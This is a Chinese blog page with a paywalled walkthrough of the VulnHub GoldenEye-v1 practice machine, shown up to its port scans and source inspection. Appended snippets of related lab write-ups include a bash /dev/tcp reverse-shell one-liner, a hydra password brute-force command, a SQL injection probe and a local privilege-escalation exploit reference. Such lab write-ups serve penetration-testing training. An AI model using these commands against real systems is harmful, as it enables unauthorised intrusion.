vulnhub靶场{GoldenEye-v1靶场实战}

已于 2022-02-10 17:18:59 修改
阅读量3.5k 收藏 2
点赞数
分类专栏: 文章 文章标签: 靶机 安全漏洞 信息安全 网络安全
于 2022-02-10 17:15:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/AerYinan/article/details/122663015
版权
本文详细介绍了在GoldenEye-v1靶场中的实战过程,包括信息收集,如IP和端口扫描,以及操作系统版本识别。通过端口80的HTTP服务,发现了一个网页,通过弱口令尝试和源码分析,获取了多个账号和密码。进一步利用这些信息,通过爆破和利用Moodle漏洞尝试获取shell,并最终通过提权获得flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

                                                                  远赴人间今鸿雁。一睹人间盛世言。

GoldenEye-v1

环境:
vulnhub靶场链接: https://www.vulnhub.com/entry/goldeneye-1,240/
kali主机:192.168.231.138
GoldenEye-v1靶机:192.168.231.143

提示:以下是本篇文章正文内容,下面案例可供参考,

一,信息收集:

1、获取对应的靶机IP:

扫描IP地址 确定IP地址 IP:192.168.231.143
命令:nmap -sP 192.168.231.0/24
在这里插入图片描述

2,获取靶机端口、操作系统版本信息:

扫描IP查看打开端口信息

  • 在这里插入图片描述
  • 在这里我们可以看到IP开发4个端口 /
  • 25 smtp端口服务 邮件传输协议 / open smtp(简单邮件传输服务)
  • 80 apache服务2.4.7 Ubuntu系统 / open http(超文本传输协议)
  • 55006/tcp ssl保密协议 /open ssl/pop3(pop3被用户代理用来邮件服务器取得邮件
  • 55007/tcp pop3服务 邮局协议 / open pop3
  • 我们直接在网站get输入IP地址 80 端口
    在这里插入图片描述
    我们根据页面提示进去             网站已经提示 /ser-home/ 输入网站登陆界面

    也不知道密码 也没有办法登陆 我们先试一下弱密码吧 admin admin123 admin123456
    不过密码不对 , 可以看一下网页代码源 有没有我们需要的信息
    在这里插入图片描述
    可以看到有两个文件 index.css 和 terminal.js
  • Index.css
    在这里插入图片描述
  • terminal.js
    在这里插入图片描述
    在index.css文件里面到是没有什么有用的
最低0.47元/天 解锁文章
GoldenEye-v1靶场
qq_35355737的博客
06-05 1930
GoldenEye-v1靶场
vulnhub靶机GoldenEye-v1
prettyX的博客
04-06 1117
靶机介绍 靶机下载地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 开始 1、ip探测,本次靶机的ip为:192.168.1.109 //kali arp-scan -l 2、nmap端口扫描 3、先尝试访问80端口 4、访问robots.txt,404 5、查看网页源码 6、继续查看这个.js文件 “Bori...
【渗透-1个项目】GoldenEye-v1
m0_62102520的博客
01-19 526
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/桌面/ ---目录自行修改。Moole 2.2.3 exp cve ---> CVE-2013-3630 漏洞可利用 29324。-L 指定文本里面的用户,- P指的是字典文件 ,-s指的是端口,最后是服务。回到之前,可以知道它是admin的密码,登陆网页尝试,成功登陆admin的账户。nc 192.168.137.32 55007  ------登陆邮箱。------登陆密码。
vulnhub靶机----GoldenEye-v1
m0_55994898的博客
08-30 295
靶机下载地址:https://www.vulnhub.com/entry/goldeneye-1,240/靶机信息:靶机信息里面已经介绍,需要设置成主机模式,并且靶机使用的是DHCP服务,ip地址自动分配。
1-VulnHub-GoldenEye-v1
尼德霍格007
07-07 901
靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/ 目标:得到root权限&找到flag.txt 作者:尼德 时间:2021-7-7 一、信息收集 打开kali虚拟机和目标机Golden Eye-v1,两台虚拟机网络都处于NAT模式 kali查看本机IP段,我的是192.168.21.0/24 nmap扫一下本网段 由于我这里只开了两台虚拟机,一台是kali,另一台扫描到的就是Golden Eye-v1,可以看到目标机的IP地址是192.16
Vulnhub系列-GoldenEye-v1
Yasso的博客
01-04 732
靶机:192.168.12.132 kali:192.168.12.128 一、信息搜集 nmap -A -p- 192.168.12.132 查看80端口 web目录:/sev-home 访问发现需要用户名和密码 查看源代码 terminal.js 访问terminal.js文件 一串unicode编码 Boris的password 得到:用户名/密码=boris/InvincibleHack3r 成功登陆 查看源代码发现两个用户名 Natalya Boris 爆破密码 hydra -l Boris -P
vulnhub靶场——GOLDENEYE: 1 渗透记录
ShenZ的博客
02-10 2412
vulnhubGOLDENEYE: 1 vulnhub靶场——GOLDENEYE: 1 渗透记录 About Description 一、信息搜集 二、网站渗透 三、Moodle漏洞利用
VulnHub靶机渗透实战(详细思路讲解)
weixin_65891791的博客
07-21 2075
使用kali中的namp工具扫描开放端口,这时kali会用一个端口号向目标主机的65535个端口发送TCP连接建立请求,回应了ack=1,syn=q的端口就是开放端口号,这里可以看到21,22,80,3306号端口是开放的。可以看到这里得到了很多哈希,带*号的是禁用的或者是空密码,将三个不带星号的密码复制下来,创建一个shell.txt文档,将三个密码复制进去。这里看到我们是没有成功进入这个网页的,应该是目录的问题,我们将目录修改一下,但是没有显示出来,可能是编码问题,再回到我们找到的源码。
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 6088
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
Vulnhub靶机实战-CYNIX 1
黑白的博客
01-18 624
声明 好好学习,天天向上 搭建 官方建议virtual打开,我这里都调成桥接 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.121 -p 1-65535 -oN nmap.A 开启端口 发现开启80,6688 访问80 http://192.168.31.121 目录扫描 gobuster dir -u http://192.168.31.121 -w /usr/share/wordlists/dirbuster/directory-lis
[渗透测试实战]vulnhub靶场1 初步掌握渗透流程(详细步骤)
知识库总结、分享
07-01 2835
Fuzzing可以帮助发现那些常规的安全测试无法发现的漏洞和弱点,因为它可以测试系统的响应能力,以及处理异常数据的能力。目前已知系统提供的服务ssh和http,web用的是WordPress cms系统,渗透系统希望获得用户和密码,访问WordPress看能不能得到账户信息。拿到正确参数,需要传入参数访问url拿到系统信息,参数file是文件的意思,第一想到的是拿到系统的账户文件/etc/passwd,继续传参数访问。不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!
Vulnhub靶场实战---DC-7
一期一会的博客
01-18 3497
0x00 环境准备 1.靶场下载官网地址 https://www.vulnhub.com/entry/dc-7,356/ 2.下载完成以后直接导入vm,kali,靶机均使用均使用NAT模式连接, 攻击机:kali 192.168.88.130 靶机:DC-7 192.168.88.133 0x01 信息收集 1.探测88网段主机,使用nmap扫描。 -sn Ping探测扫描主机,不进行端口扫描(测试过对方主机把icmp包都丢弃掉,依然能检测到对方开机状态) -sp 进行Ping扫描 -sA
Vulnhub靶机渗透测试实战(二):入门DC-2靶机完全渗透
weixin_48991458的博客
11-17 1054
Vulnhub靶机渗透测试实战(二):入门DC-2靶机完全渗透
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 3559
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
GoldenEye-v1(vulnhub)靶机练习实践报告
黑战士的博客
05-28 999
1. 观察一定要仔细\2. 熟练使用工具\3. 看到网站后要考虑其用了什么框架,是否存在漏洞可被利用;查看网页源码,是否又隐藏信息。\4. 扩展知识面,对各种框架及其可能存在的漏洞进行总结整理。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 2475
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
vulnhub靶场GoldenEye靶场
zzzzzzkeai的博客
11-17 373
vulnhub靶场GoldenEye靶场
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(三)w1r3s-101
hyjcking的博客
11-24 1383
在游览器中输入上面的url,页面没有回显,但是可以肯定的是这个php文件是存在的,可能是因为这个网站的cms经过二次开发导致目录结构发生改变,所以无法访问通,所以我打算使用curl对参数urlconfig进行urlencode编码。接下来我们只需要破解这段密文即可,把拥有密码的几个用户全部保存到pass.txt文档上(在桌面创建一个),然后命令:john pass.txt跑出密码。接下来的步骤就很明朗了,直接去百度上搜cuppa cms的漏洞,找到漏洞编号。开启靶机之后先扫了一下内网IP找到靶机的IP。
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4782
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
vulnhubgoldeneye
最新发布
02-20
### VulnHub GoldenEye VM 下载与演练 #### 背景介绍 VulnHub 是一个提供安全研究人员和爱好者使用的平台,用于下载各种带有已知漏洞的虚拟机镜像。这些资源旨在帮助学习者提升渗透测试技能并了解常见网络安全威胁。 #### 获取 GoldenEye VM 镜像 为了获取 `GoldenEye` 的 ISO 或 OVA 文件,访问 VulnHub 官方网站,在搜索栏输入 "GoldenEye"[^1] 。点击进入对应的项目页面后可以找到详细的描述以及下载链接。通常情况下,该站点会给出关于如何部署此环境的具体指导说明。 #### Walkthrough 演练概述 完成安装之后,可以通过一系列的任务来探索这台机器中存在的弱点: - **信息收集** 使用工具如 Nmap 对目标主机进行全面扫描,识别开放端口和服务版本。 - **枚举服务** 根据之前发现的服务列表进一步深入研究可能存在的配置错误或者默认账户等问题。 - **获得初始 Shell 访问权限** 利用 Web 应用程序中的 SQL 注入缺陷或者其他类型的注入攻击尝试突破防线,并最终取得远程命令执行的能力。 - **提权操作** 成功登录到低级别用户账号以后,继续寻找内核漏洞或者是其他可被利用的因素实现从普通用户向管理员身份转变的过程[^2] 。 ```bash # 执行Nmap快速扫描以检测活动主机及其开放端口 nmap -T4 -A -v <target_ip> ``` #### 注意事项 在整个过程中应当遵循道德准则,仅限于合法授权范围内开展实验;切勿将所学技术应用于非法目的之上。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值